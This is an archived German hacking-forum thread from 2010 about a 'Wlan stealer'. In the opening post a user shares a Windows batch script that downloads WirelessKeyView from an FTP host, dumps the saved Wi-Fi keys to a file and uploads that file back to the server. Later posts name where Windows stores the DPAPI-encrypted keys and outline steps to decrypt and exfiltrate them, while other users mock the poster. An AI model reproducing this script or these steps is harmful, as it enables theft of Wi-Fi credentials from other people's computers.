PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Wlan Stealer ist Feritg!



NOE_2.0
07.09.2010, 15:53
Hallo alle zusammen.

Mein Wlan stealer ist Fertig.
Ich hab eih nin Btach und Porfesorisch auch in C geschriben

Ich brächte aber noc hilfe beim Coden in C. Da ich mich mit Socketprogramierung nicht richtug auskenne.

Hier der Sealer in Batch:


@echo off
echo OPEN 111.111.111.111 >> %TEMP%\ftp.ftp
echo username >> %TEMP%\ftp.ftp
echo passwort >> %TEMP%\ftp.ftp
echo BINARY >> %TEMP%\ftp.ftp
echo GET WirelessKeyView.exe >> %TEMP%\ftp.ftp
echo bye >> %TEMP%\ftp.ftp
cls
cd %TEMP%
ftp -s:%TEMP%\ftp.ftp
cls
WirelessKeyView.exe /stext pw.txt
echo key erzeugt
cls
echo OPEN 111.111.111.111 >> %TEMP%\1ftp.ftp
echo username >> %TEMP%\1ftp.ftp
echo passwort >> %TEMP%\1ftp.ftp
echo ASCII>> %TEMP%\1ftp.ftp
echo PUT pw.txt >> %TEMP%\1ftp.ftp
echo bye >> %TEMP%\1ftp.ftp
ftp -s:%TEMP%\1ftp.ftp
cls


Hilfe beim Neuschreiben des Stealors in C könnte ich dringend gebrauchen.

LG

$_staX
07.09.2010, 15:55
Gut, dass du den Code schon selber durgestrichen hast, den mist braucht nämlich so ziemlich keiner....

c00ler C-C0de übrigens, obwohl du C ja eigentlich nicht kannst!

NOE_2.0
07.09.2010, 16:02
$_staX (http://free-hack.com/member.php?u=44930) was sol dieser Unqualifizierter Post bitte ?

Ich habe daszugeschreiben das die C lösung nichts idt und deshalb habe ich auch um Hilfe gebeten!!!

Die C und Batch lösung Funktionert aber!!

Ich weis auserdem selbst das diese Lösung sch**** ist aber deswegen hab eich auch nach hilfe gefragt und dinese Post ist nicht dazuda Blöde Komentare an den Kopf geworfen zu bekommen.

QpL
07.09.2010, 16:04
Naja - das was du gemacht hast ist zwar generell C... zumindest im Ansatz.

Dir sollte aber selbst klar sein, dass du da keine Programmiertechnische Meisterleistung vollbracht hast, sondern einfach nur dein Batch Programm in Variablen geknallt hast, und diese Abratterst. für die ganzen Fputs hättest du auch eine Schleife nehmen können ... aber das ist eher das geringste Problem.
Lies dich am besten nochmal in C ein. Dann versuch herauszufinden, wie Wirelesskey.exe sich die Wlan Daten besorgt und empfinde das nach.

Grüße

NOE_2.0
07.09.2010, 16:36
Die Verschlüsselten Keys werden an folgenden Orten gespeichert:

Windows XP:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WZCSVC\Param eters\Interfaces\[Interface Guid]
(Reg Datei)

Windows Visa/7:

c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfac es\[Interface Guid]
Dort werden sie in einem .xml file abgelegt

Die passwörter sind DPAPI verschlüsselt

Zum entschlüssen eines gespeicherten Passwortes ist in eiem anderen file ein key gespiechert der zur entschlüsselung dient

mehr dazu hier:

Data Protection API - Wikipedia, the free encyclopedia (http://en.wikipedia.org/wiki/Data_Protection_API)

Hat Jemand eine Idee

Wie man das ganze entschlüsseln kann und dann auf einen FTP Server laden kann?

Hta niemand eine Idee wie man das ganze schreiben könnte

$_staX
07.09.2010, 16:40
Wieso? Selbsteinsicht ist der erste Schritt zur Besserung!

QpL
07.09.2010, 16:45
Hta niemand eine Idee wie man das ganze schreiben könnte

Du weißt, wo die Schlüssel gespeichert werden und du weißt, wie sie verschlüsselt sind.

Jetzt koenntest du folgendes machen:

-Per API den W-Lan schlüssel auslesen
-Den Key zum entschlüsseln finden
-W-Lan PW Entschlüsseln (Routine schreiben oder so)
-An FTP senden.

Viel Erfolg dabei!
tut mir ja leid aber ich glaube das schaffst du noch nicht :x
Grüße

NOE_2.0
07.09.2010, 17:31
Sorry da ich den Code immer Durchgestrichen Poste weis aber nicht richtig wie es funktionert ihn nicht durchzustreichen.

IST C für so ein Projekt überhapt passend?
weil es ist ja eine Microsoft verschlüsselung und da wäre VB doch besser oder ?

LG

blackberry
07.09.2010, 18:16
Sorry da ich den Code immer Durchgestrichen Poste weis aber nicht richtig wie es funktionert ihn nicht durchzustreichen.
Um den Code nicht durchzustreichen streichst du ihn einfach nicht durch... was ist daran so schwer?
Oder ist bei dir jeder Text den du eingibst automatisch durchgestrichen?
Falls nicht, würde ich auch dazu raten den Code zwischen CODE-Tags zu schreiben (ohne Leerzeichen --> [ CODE]...hier...[/CODE]).


IST C für so ein Projekt überhapt passend?

OpCodez kann auf diese Frage leider nicht antworten, da er sich, wie er mit unlängst mitteilte, aufgrund dieser Frage schreiend auf dem Boden wälzt und dieser Zustand wohl noch eine Weile anhalten wird.
Darum übernehme ich diesen Part und sage: C ist dafür geeignet genug. Die einzige Frage, die es noch zu beantworten gilt ist: bist du überhaupt passend um sowas in C zu schreiben?
Es tut mir leid, aber mir kommen (genau wie $_staX) große Zweifel an deinen C-Fertigkeiten auf.


weil es ist ja eine Microsoft verschlüsselung und da wäre VB doch besser oder ?
Kein Kommentar / sprachlos.